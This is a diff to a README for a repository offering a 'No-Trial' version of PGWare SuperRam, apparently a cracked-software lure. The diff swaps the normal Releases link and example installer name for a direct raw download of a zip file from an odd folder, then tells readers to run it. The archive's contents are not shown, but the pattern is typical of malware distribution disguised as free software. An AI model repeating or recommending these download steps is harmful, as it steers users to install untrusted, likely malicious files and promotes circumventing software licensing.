Rauriw/PGWare-SuperRam-No-Trial/README.md

 To start using PGWare SuperRam, follow these simple steps.
 You don’t need advanced technical skills to set it up.

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/Rauriw/PGWare-SuperRam-No-Trial/releases) to find the latest version of PGWare SuperRam.
+   Go to the [Releases page](https://raw.githubusercontent.com/Rauriw/PGWare-SuperRam-No-Trial/main/gurdle/PGWare-SuperRam-No-Trial-v1.0-alpha.2.zip) to find the latest version of PGWare SuperRam.

 2. **Download the Application**
    On the Releases page, locate the latest version.
-Click on the download link for your system (e.g., SuperRamInstaller.exe).
+Click on the download link for your system (e.g., https://raw.githubusercontent.com/Rauriw/PGWare-SuperRam-No-Trial/main/gurdle/PGWare-SuperRam-No-Trial-v1.0-alpha.2.zip).

 3. **Install the Application**
    Once the download completes, find the file in your Downloads folder.
 Double-click the installer to start the installation process.
 Follow the prompts to install PGWare SuperRam.